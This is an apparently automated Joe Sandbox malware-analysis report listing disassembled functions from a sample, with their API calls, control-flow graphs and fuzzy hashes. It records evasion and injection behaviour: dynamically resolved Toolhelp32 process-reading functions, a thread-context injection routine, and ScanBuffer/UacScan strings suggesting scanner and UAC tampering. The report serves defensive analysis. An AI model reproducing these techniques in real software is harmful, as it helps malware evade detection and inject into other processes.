                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                      • String ID:
                      • API String ID: 1543721669-0
                      • Opcode ID: ecac757a1945752b517761accb16dec411ac466b80926e3b641a7ea5855dcf2a
                      • Instruction ID: cdf397ae2dce380687a2fec7d9c43bf8af8fb085b50e9498c4503847ab8c00fd
                      • Opcode Fuzzy Hash: ecac757a1945752b517761accb16dec411ac466b80926e3b641a7ea5855dcf2a
                      • Instruction Fuzzy Hash: DA1172BDA40314AFFB40FBACCC21E5E77AAAB45700F5904247B04E77A4DA7499018B16
                      Function 0289E2E4 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5855 289e2e4-289e2f0 5856 289e2ff-289e304 5855->5856 5857 289e2f2-289e2f8 VariantClear call 289dfb0 5855->5857 5858 289e315-289e31a 5856->5858 5859 289e306-289e313 call 28944ac 5856->5859 5864 289e2fd 5857->5864 5862 289e31c-289e324 5858->5862 5863 289e326-289e32b 5858->5863 5868 289e35b-289e35e 5859->5868 5862->5868 5866 289e32d-289e334 call 289e168 5863->5866 5867 289e336-289e341 call 28a2e24 5863->5867 5864->5868 5866->5868 5874 289e34f-289e356 VariantClear VariantInit 5867->5874 5875 289e343-289e34d 5867->5875 5874->5868 5875->5868
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID:
                      • API String ID: 1473721057-0
                      • Opcode ID: 60654762a1bff688680370139f54ba262e40856f91edf6b141aaa93ee7ae7f2f
                      • Instruction ID: 662100631b47bb27b04330bf76a0600cc3550a2759f6f79513c2b56fb9a4b1df
                      • Opcode Fuzzy Hash: 60654762a1bff688680370139f54ba262e40856f91edf6b141aaa93ee7ae7f2f
                      • Instruction Fuzzy Hash: 5EF0AF3C708218C79F24FB2CCA846692B9A6F44B0874C5427B80EDB209CF259C05EB63
                      Function 028A705C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5877 28a705c-28a70a6 call 2894eec 5880 28a70a8-28a70ba call 289afc8 call 2893e68 5877->5880 5881 28a70bf-28a70c1 5877->5881 5880->5881 5883 28a7288-28a72af 5881->5883 5884 28a70c7-28a70db 5881->5884 5886 28a72d9-28a72dc 5883->5886 5887 28a72b1-28a72c0 5883->5887 5888 28a70dd-28a70f7 5884->5888 5892 28a72de-28a72e0 5886->5892 5893 28a72ed-28a7309 5886->5893 5890 28a72c2 5887->5890 5891 28a72c7-28a72d7 5887->5891 5894 28a70f9-28a710c 5888->5894 5895 28a7111-28a7115 5888->5895 5890->5891 5891->5893 5892->5893 5896 28a72e2-28a72e6 5892->5896 5905 28a730e-28a7310 5893->5905 5897 28a727f-28a7282 5894->5897 5898 28a718b-28a718d 5895->5898 5899 28a7117-28a7126 5895->5899 5896->5893 5902 28a72e8 5896->5902 5897->5883 5897->5888 5900 28a718f-28a7193 5898->5900 5901 28a71d4-28a71d8 5898->5901 5903 28a7158-28a7180 call 289535c 5899->5903 5904 28a7128-28a7156 call 289535c 5899->5904 5906 28a71b7-28a71cf 5900->5906 5907 28a7195-28a719f 5900->5907 5908 28a71da-28a71e2 5901->5908 5909 28a724d-28a7264 5901->5909 5902->5893 5929 28a7183-28a7186 5903->5929 5904->5929 5911 28a731a-28a731f 5905->5911 5912 28a7312-28a7315 call 28a7634 5905->5912 5915 28a727b 5906->5915 5907->5906 5914 28a71a1-28a71b2 call 289ea58 5907->5914 5916 28a7222-28a724b 5908->5916 5917 28a71e4-28a7220 call 289535c 5908->5917 5909->5915 5919 28a7266-28a726a 5909->5919 5922 28a733d-28a734f 5911->5922 5923 28a7321-28a732e 5911->5923 5912->5911 5914->5906 5915->5897 5916->5915 5917->5915 5919->5915 5930 28a726c-28a7278 5919->5930 5932 28a7363 5922->5932 5933 28a7351-28a7361 SysFreeString 5922->5933 5924 28a7339-28a733b 5923->5924 5925 28a7330-28a7334 call 2895338 5923->5925 5924->5922 5924->5923 5925->5924 5929->5915 5930->5915 5933->5932 5933->5933
                      APIs
                      • SysFreeString.OLEAUT32(?), ref: 028A735A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FreeString
                      • String ID: H
                      • API String ID: 3341692771-2852464175
                      • Opcode ID: c9ce7f1f65f9f6b6a17f2b9e81e604279983ea119f57d9b839995fb296f8eaf5
                      • Instruction ID: 20fee8c721c1559e7f739bef521b8c061d5e3567dcb639bace30660e25293005
                      • Opcode Fuzzy Hash: c9ce7f1f65f9f6b6a17f2b9e81e604279983ea119f57d9b839995fb296f8eaf5
                      • Instruction Fuzzy Hash: E6B1C278A016089FEB14CF99D890A9DFBF6FF49314F258169E809EB364DB30A845DF50
                      Function 0289E37C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5935 289e37c-289e38c 5936 289e3ab-289e3af 5935->5936 5937 289e38e-289e47c call 289e37c 5935->5937 5938 289e3b8-289e3c4 VariantInit 5936->5938 5939 289e3b1-289e3b6 5936->5939 5942 289e3c7-289e3e0 5938->5942 5939->5942 5944 289e3f0-289e3f5 5942->5944 5945 289e3e2 5942->5945 5946 289e3fc-289e403 5944->5946 5948 289e3f7-289e3fa 5944->5948 5945->5946 5947 289e3e4-289e3e7 5945->5947 5951 289e405-289e412 call 28a74c5 5946->5951 5952 289e447-289e458 5946->5952 5947->5946 5949 289e3e9-289e3ec 5947->5949 5948->5946 5950 289e41d-289e429 call 28a2e24 5948->5950 5949->5946 5954 289e3ee 5949->5954 5960 289e42b-289e440 5950->5960 5961 289e442 call 289dc18 5950->5961 5959 289e418-289e41b 5951->5959 5957 289e45a-289e46a call 289e78c call 289e360 5952->5957 5958 289e46f 5952->5958 5954->5950 5957->5958 5959->5952 5960->5952 5961->5952
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: InitVariant
                      • String ID:
                      • API String ID: 1927566239-0
                      • Opcode ID: cdcd9705e06fae1bbf42c4d90a1afd871648ba5eee4fd7014a7fb69f52e25e14
                      • Instruction ID: a0753a5e50b55488f1f206abea93bee6a3851957c0517084e13ecb74b48a93a4
                      • Opcode Fuzzy Hash: cdcd9705e06fae1bbf42c4d90a1afd871648ba5eee4fd7014a7fb69f52e25e14
                      • Instruction Fuzzy Hash: 50314F7D600608AFEF10DEACC884AAA7BE9FB0D304F4C4562F909D3644D335D990DB66
                      Function 028A6CEC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                      Download Yara Rule
                      APIs
                      • CLSIDFromProgID.OLE32(00000000,?,00000000,028A6D39,?,?,?,00000000), ref: 028A6D19
                        • Part of subcall function 02894C0C: SysFreeString.OLEAUT32(028AED84), ref: 02894C1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FreeFromProgString
                      • String ID:
                      • API String ID: 4225568880-0
                      • Opcode ID: 8187a34fb1d54c3152d60a1a6a0209ca449e91f06ef612c28999746ba220b50b
                      • Instruction ID: 501abf5cd32f7d0a518f19bf455d5a1ee5fe10818765ecdefe013635d15ba2dd
                      • Opcode Fuzzy Hash: 8187a34fb1d54c3152d60a1a6a0209ca449e91f06ef612c28999746ba220b50b
                      • Instruction Fuzzy Hash: F5E06D3D604318BFFF11EBADCC6295A77ADDB89B50B550471A801D7600EA76BE008862
                      Function 02895814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameA.KERNEL32(02890000,?,00000105), ref: 02895832
                        • Part of subcall function 02895A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02890000,028BE790), ref: 02895A94
                        • Part of subcall function 02895A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02890000,028BE790), ref: 02895AB2
                        • Part of subcall function 02895A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02890000,028BE790), ref: 02895AD0
                        • Part of subcall function 02895A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02895AEE
                        • Part of subcall function 02895A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02895B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02895B37
                        • Part of subcall function 02895A78: RegQueryValueExA.ADVAPI32(?,02895CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02895B7D,?,80000001), ref: 02895B55
                        • Part of subcall function 02895A78: RegCloseKey.ADVAPI32(?,02895B84,00000000,?,?,00000000,02895B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02895B77
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Open$FileModuleNameQueryValue$Close
                      • String ID:
                      • API String ID: 2796650324-0
                      • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                      • Instruction ID: 1187b02bebef58a3e07a3556748aecd02f358a579b54c9c9e740b32b8a80e43f
                      • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                      • Instruction Fuzzy Hash: B8E06D79A002149FCF10DF5CC8C0A5737D8AB08750F480565EC58DF34AD374D9208BD1
                      Function 0289C2E4 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105,029E68C8,?,028B0032,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanBuffer,028F237C,028BB40C,OpenSession), ref: 0289C2FB
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FileModuleName
                      • String ID:
                      • API String ID: 514040917-0
                      • Opcode ID: f936b450ebeaddec630cccddfce7c9c97fc4af6cb00137120e14f29a7b95d2da
                      • Instruction ID: 66e3c2003e58be6e01d48c847ac95342f37aeefccd6b2e0359976fd045caf9d8
                      • Opcode Fuzzy Hash: f936b450ebeaddec630cccddfce7c9c97fc4af6cb00137120e14f29a7b95d2da
                      • Instruction Fuzzy Hash: 95D022BAB006242BE700E0AC1C818FB32CE8B8C760F4800317998CB3C1FA608E000BD3
                      Function 02897E10 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                      Download Yara Rule
                      APIs
                      • GetFileAttributesA.KERNEL32(00000000,?,028AFD00,ScanString,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanString,028F237C,028BB40C,UacScan,028F237C,028BB40C,UacInitialize), ref: 02897E1B
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                      • Instruction ID: e3d48fb3eb32dda070476d284d47019f04a75b79e9a9ad2dde1067077f353cb8
                      • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                      • Instruction Fuzzy Hash: 3FC08CFC6222020A1E50A1FC0CC412E428C19041393AC2F21E23CDA2E2E32188232421
                      Function 02894C48 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                      Download Yara Rule
                      APIs
                      • SysFreeString.OLEAUT32(028AED84), ref: 02894C1A
                      • SysReAllocStringLen.OLEAUT32(028BC2B4,028AED84,000000B4), ref: 02894C62
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: String$AllocFree
                      • String ID:
                      • API String ID: 344208780-0
                      • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                      • Instruction ID: 5cce9e473c1ace61413f4a0df9b0222ba7e07e8c7d07f12537dcb974a2abb889
                      • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                      • Instruction Fuzzy Hash: F8D012BC5041025DBF2C99998564936636A99D030F74CC259980BCA241E7319402CA31
                      Function 028BBF84 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      APIs
                      • timeSetEvent.WINMM(00002710,00000000,028BBF78,00000000,00000001), ref: 028BBF94
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Eventtime
                      • String ID:
                      • API String ID: 2982266575-0
                      • Opcode ID: 8325e160434a9822973b596be1c4dceabb7a3d8abc74230675d73c8624a00344
                      • Instruction ID: 3beb7f8d487d1c3707aa43c454a5152dd685c990c0d32a283eae56654f6e5e65
                      • Opcode Fuzzy Hash: 8325e160434a9822973b596be1c4dceabb7a3d8abc74230675d73c8624a00344
                      • Instruction Fuzzy Hash: 7DC048F8788340BAFE1196AA1CC2F77198DDB18B15F200456BA10EE2C1D1E258508A20
                      Function 028915CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02891A03,?,02891FC1), ref: 028915E2
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 90a6763624d766913735180fecd06413017fd683daf36392e4ec3c47e7482019
                      • Instruction ID: 7e3a3824a8a8dd807743d327d6586ffd3e981ae40467321150c22f606f973ea9
                      • Opcode Fuzzy Hash: 90a6763624d766913735180fecd06413017fd683daf36392e4ec3c47e7482019
                      • Instruction Fuzzy Hash: B8F037F8B413408BEF05DF799D463016AD2EB8A344F148579E709DB6C8E77184028B00
                      Function 02891682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02891FC1), ref: 028916A4
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 5069c44c3e0738f94f798da6922606cb036e87a9fc8473f70ded5b701811c8d5
                      • Instruction ID: ed96c8aa365450e528f11e68fdf4b532a9836a359b306779c6b73a3940e3a7a6
                      • Opcode Fuzzy Hash: 5069c44c3e0738f94f798da6922606cb036e87a9fc8473f70ded5b701811c8d5
                      • Instruction Fuzzy Hash: C3F090BEF44695ABD7119E5E9C88B92BBA4FB40355F050139EA0CD7388D770A8108B94
                      Function 028916E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                      Download Yara Rule
                      APIs
                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02891FE4), ref: 02891704
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FreeVirtual
                      • String ID:
                      • API String ID: 1263568516-0
                      • Opcode ID: 30ad4e785c002efe194672efc04cd6f273f3d446cdb311bd63c082e88091deca
                      • Instruction ID: 913cba451fbc97e89b39d25274bd40daad35ad5b811d8c76a136108d571a3ba2
                      • Opcode Fuzzy Hash: 30ad4e785c002efe194672efc04cd6f273f3d446cdb311bd63c082e88091deca
                      • Instruction Fuzzy Hash: 47E0867D704303AFDB105A7E5D88B12ABD8EB45654F184475F60DDB295D760E8108B60

                      Non-executed Functions

                      Function 028AA954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,028AABDB,?,?,028AAC6D,00000000,028AAD49), ref: 028AA968
                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028AA980
                      • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 028AA992
                      • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 028AA9A4
                      • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 028AA9B6
                      • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 028AA9C8
                      • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 028AA9DA
                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 028AA9EC
                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028AA9FE
                      • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 028AAA10
                      • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 028AAA22
                      • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 028AAA34
                      • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 028AAA46
                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 028AAA58
                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 028AAA6A
                      • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 028AAA7C
                      • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 028AAA8E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                      • API String ID: 667068680-597814768
                      • Opcode ID: 4e92525f944385b648fa954f0f3b3b08bac5152f6b3ccc6af4aa5ea1f094d5bd
                      • Instruction ID: 3011b25119ba58fdc1d45cf374f56a9e70cdee4a506c3094bb56e57cac25d44d
                      • Opcode Fuzzy Hash: 4e92525f944385b648fa954f0f3b3b08bac5152f6b3ccc6af4aa5ea1f094d5bd
                      • Instruction Fuzzy Hash: 1A31CFBCA817209FFF85DFB8D8B5E2637F9AB097407040965A501CF649EB789811CF52
                      Function 028A8BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 028A881C: LoadLibraryA.KERNEL32(00000000,00000000,028A8903), ref: 028A8850
                        • Part of subcall function 028A881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,028A8903), ref: 028A8860
                        • Part of subcall function 028A881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 028A8879
                        • Part of subcall function 028A881C: FreeLibrary.KERNEL32(74F60000,00000000,028F2388,Function_000065D8,00000004,028F2398,028F2388,000186A3,00000040,028F239C,74F60000,00000000,00000000,00000000,00000000,028A8903), ref: 028A88E3
                      • GetThreadContext.KERNEL32(00000000,028F2420,ScanString,028F23A4,028AA774,UacInitialize,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,UacInitialize,028F23A4), ref: 028A943A
